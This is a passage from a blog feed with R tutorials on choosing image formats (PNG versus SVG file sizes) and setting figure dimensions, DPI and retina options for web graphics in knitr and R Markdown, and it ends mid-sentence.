&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;no_of_pts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;50000&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; no_of_pts) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;runif&lt;/span&gt;(i)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;runif&lt;/span&gt;(i)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Save graphic using SVG, PNG, etc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first scatter plot (when &lt;code&gt;i = 1&lt;/code&gt;) only contains a single point, whereas the final scatter plot contains &lt;code&gt;i = 100000&lt;/code&gt; points, and is almost entirely black with points.
For each scatter plot, we generated&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a PNG version&lt;/li&gt;
&lt;li&gt;a PNG version, optimised using &lt;code&gt;optipng&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;an SVG version.&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="file-format-comparision-1.svg" title="Comparison of file sizes of different file formats." alt="Comparison of file sizes of different file formats." width="600px" style="display: block; margin: auto;" /&gt;
&lt;p&gt;The figure shows that the file size increases with the number of points. However, at around 10,000 points, the PNG
file size starts to decrease. This is because the plot becomes an almost uniformly black panel, which compresses well. In contrast,
the file sizes for SVGs increase in a predictably linear fashion. When plotting 200 points,
the file size is starting to get prohibitive. At around 5,000 points, the SVG file is over 1MB.&lt;/p&gt;
&lt;p&gt;As an aside, the JPEG file size is about the same as the PNG file size in this test.&lt;/p&gt;
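&lt;p&gt;To try a comparison like this yourself, something along the following lines should work. It is a minimal sketch rather than the exact script behind the figure: &lt;code&gt;compare_sizes()&lt;/code&gt; is a made-up helper, the 400px (and 4 inch) dimensions are arbitrary choices, and it assumes your R build supports the &lt;code&gt;svg()&lt;/code&gt; device.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)
# Hypothetical helper: save a scatter plot of n points as PNG and SVG,
# then return both file sizes in bytes
compare_sizes = function(n) {
  g = ggplot(data.frame(x = runif(n), y = runif(n))) +
    geom_point(aes(x, y))
  png_file = tempfile(fileext = &amp;#34;.png&amp;#34;)
  svg_file = tempfile(fileext = &amp;#34;.svg&amp;#34;)
  png(png_file, width = 400, height = 400)  # dimensions in pixels
  print(g)
  dev.off()
  svg(svg_file, width = 4, height = 4)  # svg() dimensions are in inches
  print(g)
  dev.off()
  c(n = n, png = file.size(png_file), svg = file.size(svg_file))
}
# One column per plot; rows are n, PNG size and SVG size
sapply(c(10, 100, 1000), compare_sizes)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;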
&lt;h3 id="next-generation-formats"&gt;Next Generation Formats&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;ve ever used Google&amp;rsquo;s PageSpeed Insights, one of the recommendations is to
serve images in &lt;a href="https://web.dev/uses-webp-images/" rel="external"&gt;next-gen formats&lt;/a&gt;, such as JPEG 2000, JPEG XR, and WebP. However, a little investigation suggests this is overkill for the vast majority of sites.
As a significant number of browsers don&amp;rsquo;t yet support these formats, shaving off a few bytes
doesn&amp;rsquo;t seem worth the effort. Obviously if you have a top 100 site like Amazon or are serving
lots of images on a page, then it may well be worth the hassle. For most sites using Hugo, shaving milliseconds off load time isn&amp;rsquo;t required.&lt;/p&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Spending a little time optimising file size brings lots of benefits&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;your web-pages load faster&lt;/li&gt;
&lt;li&gt;your documents are smaller&lt;/li&gt;
&lt;li&gt;your GitLab repo clones quicker and takes up less storage&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Typically, I don&amp;rsquo;t care about optimising to the nearest byte, but a combination of choosing
the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct dimensions&lt;/a&gt;
and the correct image type gives you something close to optimal with little thought.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Image sizes in an R markdown Document</title><link>https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/</link><pubDate>Mon, 15 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our four-part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure dimension&lt;/a&gt; in {knitr} (this post).&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image format&lt;/a&gt; should you use for graphics.&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external graphics&lt;/a&gt; in your document.&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr} &lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;options&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we recently moved our website from
WordPress to &lt;a href="https://gohugo.io/" rel="external"&gt;Hugo&lt;/a&gt;.
The main reason for the move was that, since the team are all very comfortable with Git,
continuous integration and continuous deployment,
using a static web-site generator made more sense than WordPress. Additional benefits
are faster page loading times and better general site security - WordPress sites are notorious for
getting hacked if not kept up to date.&lt;/p&gt;
&lt;p&gt;While thinking about WordPress brings a host of painful memories,
one of its benefits is that it does (sort of) hide the pain of optimising images for web-pages.
There are numerous WordPress plugins that manipulate, cache and optimise the delivery
of your graphics. Of course, this is also a potential security problem, but that&amp;rsquo;s another story.
When we ported over our pages, we noticed that the graphics on &lt;a href="https://www.jumpingrivers.com/blog/" rel="external"&gt;blog&lt;/a&gt; posts and
&lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course descriptions&lt;/a&gt; were all slightly different.
The images had different resolutions, file formats and dimensions.
While they all looked OK, they certainly weren&amp;rsquo;t standardised or optimised!&lt;/p&gt;
&lt;p&gt;In this series of posts we&amp;rsquo;ll consider the (simple?) task of generating and including figures
for the web using R &amp;amp; {knitr}. Originally this was going to be a single post,
but as the length increased, we decided to split it into separate articles.
The four posts we intend to cover are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;setting the image size (this post)&lt;/li&gt;
&lt;li&gt;selecting the image type, PNG vs JPEG vs SVG&lt;/li&gt;
&lt;li&gt;including non-generated files in a document&lt;/li&gt;
&lt;li&gt;setting global {knitr} options.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Before we go further, this series of articles is aimed at web documents.
How we handle PDFs is slightly different and will be covered at a different time.
Also, I&amp;rsquo;m trying to optimise images for the web, but at the same time, I&amp;rsquo;m not going to
chase down every last byte to shave a millisecond off page-speeds.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also worth reading our previous post on generating &lt;a href="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/" rel="external"&gt;consistent graphs&lt;/a&gt; in R across different
operating systems.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-rmarkdown-image-size"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-makes-figures-special"&gt;What Makes Figures Special&lt;/h2&gt;
&lt;p&gt;There&amp;rsquo;s lots of information on the web on how to optimise images for websites.
Figures like line graphs, scatter plots and histograms, have to be handled
a little differently than pictures. Graphs have a few distinctive characteristics.&lt;/p&gt;
&lt;p&gt;As they usually contain text, we have to pay specific attention to
image quality. Also, while we can resize a photograph easily, resizing a graph with
text may make the axis labels unreadable.
Furthermore, graphs contain thin lines and perhaps use opacity within the plot.&lt;/p&gt;
&lt;p&gt;The core problem we are trying to solve is that when we create a web page (an HTML file),
the page gives a containing box with a certain width and height.
We want to create a figure that matches these dimensions.&lt;/p&gt;
&lt;p&gt;If the figure we create is too large for the box, the browser (or some clever server-side plugin) will resize your image. This has two downsides&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the client downloads a larger file than it needs, which increases your page loading time&lt;/li&gt;
&lt;li&gt;if the figure contains text, then the text will become smaller&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If the figure is smaller than the box, then your figure will look pixelated and the text
may become unreadable.&lt;/p&gt;
&lt;h3 id="the-dpi-issue"&gt;The DPI issue&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;ve ever Googled web-graphics before, you will have come across DPI or dots per inch.
The typical recommendation for web-graphics is 72dpi. However, this is completely the &lt;a href="https://daraskolnick.com/image-dpi-web/" rel="external"&gt;wrong&lt;/a&gt; way of thinking about it.
When you put a graphic/image on a website, you have a set number of pixels.
This is the unit of measurement you need to consider when generating a graphic.
If you are generating a graph for a PDF, then DPI is important as you can cram more points
in a space. However, on a monitor you have pixels.&lt;/p&gt;
&lt;p&gt;If your web-designer tells you to provide a 600px by 600px image - that&amp;rsquo;s what they need. DPI
doesn&amp;rsquo;t actually come into this calculation!&lt;/p&gt;
&lt;p&gt;The one caveat to the above (as we&amp;rsquo;ll see) is that DPI alters the text size when creating
R images.&lt;/p&gt;
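&lt;p&gt;As a quick illustration of that caveat, the sketch below writes the same plot twice at identical pixel dimensions, changing only the &lt;code&gt;res&lt;/code&gt; argument of &lt;code&gt;png()&lt;/code&gt;. The file names and the two resolution values are arbitrary choices for this example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)
g = ggplot(data.frame(x = 0:10, y = 0:10), aes(x, y)) +
  geom_point()
# Both files are 400px by 400px; only the nominal resolution differs,
# which changes how large the text and points are drawn
png(&amp;#34;figure-res72.png&amp;#34;, width = 400, height = 400, res = 72)
print(g)
dev.off()
png(&amp;#34;figure-res144.png&amp;#34;, width = 400, height = 400, res = 144)
print(g)
dev.off()
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Opening the two files side-by-side should show noticeably larger text in the &lt;code&gt;res = 144&lt;/code&gt; version, even though the pixel dimensions are the same.&lt;/p&gt;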
&lt;h3 id="setting-image-dimensions"&gt;Setting image dimensions&lt;/h3&gt;
&lt;p&gt;If you are creating graphics using the &lt;code&gt;png()&lt;/code&gt; function (or a similar graphics device),
then you simply need to specify the dimensions using the &lt;code&gt;width&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt;
arguments. As an example, let&amp;rsquo;s create a simple {ggplot2} scatter plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(dd, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which we then save with dimensions of 400px by 400px:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-400.png&amp;#34;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This creates a perfectly sized 400px by 400px image&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# As we&amp;#39;ll see below, we may have to double this resolution&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# for retina displays&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dim&lt;/span&gt;(png&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;readPNG&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-400.png&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 400 400&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we include the scatter plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-400.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="figure1-400.png" width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;it comes out at the perfect size and resolution.&lt;/p&gt;
&lt;h2 id="the-graphics-goldilocks-principle"&gt;The graphics Goldilocks principle&lt;/h2&gt;
&lt;p&gt;Suppose we create images that aren&amp;rsquo;t the correct size for the HTML container.
Is it really that bad? If we create an image double the size, 800px by 800px,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-800.png&amp;#34;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and try to squeeze it into a 400px box, the font
size becomes tiny.
The &amp;ldquo;quality&amp;rdquo; of the figure is fine; it&amp;rsquo;s just unreadable.&lt;/p&gt;
&lt;img src="figure1-800.png" width="800" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;If we create an image that is only 200px and then expand it to fit the 400px container box,
the text becomes too large and the graph is fuzzy.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1-200.png&amp;#34;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="figure1-200.png" width="200" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Instead, we need something not too big, not too small. But something that &lt;em&gt;just&lt;/em&gt; fits.&lt;/p&gt;
&lt;h2 id="setting-sizes-in-knitr"&gt;Setting sizes in {knitr}&lt;/h2&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, most of the
graphs we create for HTML pages are generated within an
R markdown document via {knitr}. Above, we created images
by specifying the exact number of pixels. However, in {knitr}
you can&amp;rsquo;t specify the number of pixels when creating the image.
Instead, you set the figure dimensions and also the output dimensions.
The image units are
&lt;a href="https://github.com/yihui/knitr/blob/479eba89314984930f3dd336fd3d929bf2909e91/R/plot.R#L61" rel="external"&gt;hard-coded&lt;/a&gt; as inches
within {knitr}.&lt;/p&gt;
&lt;p&gt;The dimensions of the image are calculated via &lt;code&gt;fig.height * dpi&lt;/code&gt; and &lt;code&gt;fig.width * dpi&lt;/code&gt;.
The &lt;code&gt;fig.retina&lt;/code&gt; argument also comes into play, but we&amp;rsquo;ll set &lt;code&gt;fig.retina = 1&lt;/code&gt;, which will match above, then come back to this idea at the end.&lt;/p&gt;
&lt;p&gt;If we want to create an image with dimensions &lt;code&gt;d1&lt;/code&gt; and &lt;code&gt;d2&lt;/code&gt;, then we set the {knitr} chunks to&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.width = d1 / 72&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.height = d2 / 72&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dpi = 72&lt;/code&gt; - the default&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.retina = 1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dev.args = list(type = &amp;quot;cairo-png&amp;quot;)&lt;/code&gt; - not actually needed, but you &lt;a href="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/" rel="external"&gt;should&lt;/a&gt; set it!&lt;/li&gt;
&lt;/ul&gt;
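&lt;p&gt;As a rough sketch of the settings listed above, the following sets the chunk options globally for a 400px by 400px image. The &lt;code&gt;target_px&lt;/code&gt; and &lt;code&gt;dpi&lt;/code&gt; variables are illustrative names rather than {knitr} options, and &lt;code&gt;dev = &amp;quot;png&amp;quot;&lt;/code&gt; is an assumption made so that the &lt;code&gt;type&lt;/code&gt; argument is passed on to &lt;code&gt;png()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Desired image size in pixels (illustrative values)
target_px = c(width = 400, height = 400)
dpi = 72 # the {knitr} default

knitr::opts_chunk$set(
  fig.width = target_px[[&amp;#34;width&amp;#34;]] / dpi,   # {knitr} expects inches
  fig.height = target_px[[&amp;#34;height&amp;#34;]] / dpi, # {knitr} expects inches
  dpi = dpi,
  fig.retina = 1,
  dev = &amp;#34;png&amp;#34;, # assumed device
  dev.args = list(type = &amp;#34;cairo-png&amp;#34;)
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The same values could instead be given in an individual chunk header if only some figures need them.&lt;/p&gt;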
&lt;p&gt;In theory, you should be able to set &lt;code&gt;dpi&lt;/code&gt; to anything and get the same image, but the &lt;code&gt;dpi&lt;/code&gt; value
is passed to the &lt;code&gt;res&lt;/code&gt; argument in &lt;code&gt;png()&lt;/code&gt;, and that controls the text scaling.
So changing &lt;code&gt;dpi&lt;/code&gt; means your text changes.
In practice, leave &lt;code&gt;dpi&lt;/code&gt; at the default value.
If you want to change your text size, then change it in your plot.&lt;/p&gt;
&lt;h2 id="but-what-about-outwidth-and-outheight"&gt;But what about out.width and out.height?&lt;/h2&gt;
&lt;p&gt;The {knitr} arguments &lt;code&gt;out.width&lt;/code&gt; and &lt;code&gt;out.height&lt;/code&gt; &lt;strong&gt;don&amp;rsquo;t&lt;/strong&gt; change the dimensions of the &lt;code&gt;png&lt;/code&gt;
created. Instead, they control the size of the HTML container on the web page. As we saw
above, we want the container size to match the image size. By default this should happen,
but you can specify the sizes explicitly, e.g. &lt;code&gt;out.width = &amp;quot;400px&amp;quot;&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="but-what-about-figretina"&gt;But what about fig.retina?&lt;/h2&gt;
&lt;p&gt;When &lt;code&gt;fig.retina&lt;/code&gt; is set to 2, the &lt;code&gt;dpi&lt;/code&gt; is doubled, but the display size is halved.
The practical result of this is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;file sizes increase, so page loading time also increases&lt;/li&gt;
&lt;li&gt;anyone with a retina display will see a crisper graph&lt;/li&gt;
&lt;li&gt;if someone zooms into the plot on the browser, the graph should still look nice even at
200% magnification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The defaults for &lt;code&gt;fig.retina&lt;/code&gt; differ between {rmarkdown} and {knitr}. So rather than
trying to figure it out, set it explicitly at the top of the document via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Or 1 if you want&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(fig.retina &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Whether you set it to 1 or 2 doesn&amp;rsquo;t affect the values you set for &lt;code&gt;dpi&lt;/code&gt; and &lt;code&gt;fig.&lt;/code&gt;
What it &lt;strong&gt;does&lt;/strong&gt; affect is the size of the generated image. If you don&amp;rsquo;t believe me,
